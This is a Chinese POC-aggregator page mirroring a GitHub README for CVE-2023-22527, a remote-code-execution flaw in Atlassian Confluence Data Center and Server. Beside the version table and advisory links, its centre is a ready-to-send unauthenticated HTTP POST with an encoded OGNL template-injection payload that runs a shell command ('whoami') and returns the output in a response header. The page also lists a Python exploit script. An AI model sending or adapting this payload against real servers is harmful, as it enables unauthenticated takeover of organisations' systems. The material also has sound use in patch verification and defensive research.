POC详情: 6ad9dfa5fad2fb953b8eabc6528bd56c71359414

来源
https://github.com/Manh130902/CVE-2023-22527-POC
关联漏洞
标题: Atlassian Confluence 安全漏洞 (CVE-2023-22527)
描述:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。
描述
A critical severity Remote Code Execution (RCE) vulnerability (CVE-2023-22527) was discovered in Confluence Server and Data Center.
介绍
# [CVE-2023-22527](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22527)

![](https://img.shields.io/static/v1?label=Product&message=Confluence%20Data%20Center&color=blue)
![](https://img.shields.io/static/v1?label=Product&message=Confluence%20Server&color=blue)
![](https://img.shields.io/static/v1?label=Version&message=n%2Fa&color=blue)
![](<https://img.shields.io/static/v1?label=Vulnerability&message=RCE%20(Remote%20Code%20Execution)&color=brighgreen>)

## Description

A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.

| Product                           | Affected Versions                                        |
| :-------------------------------- | :------------------------------------------------------- |
| Confluence Data Center and Server | 8.0.x <br />8.2.x<br />8.3.x<br />8.4.x<br />8.5.0-8.5.3 |

## POC
```
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close

label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29

```
![image](https://github.com/Manh130902/CVE-2023-22527-POC/assets/93723285/897e60ea-e648-4e07-ba32-4f7dd24fe6b4)

## Reference

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

https://nvd.nist.gov/vuln/detail/CVE-2023-22527
文件快照

 [4.0K]  /data/pocs/6ad9dfa5fad2fb953b8eabc6528bd56c71359414
├── [2.9K]  CVE-2023-22527.py
├── [1.7K]  CVE-2023-22527.yaml
└── [2.2K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。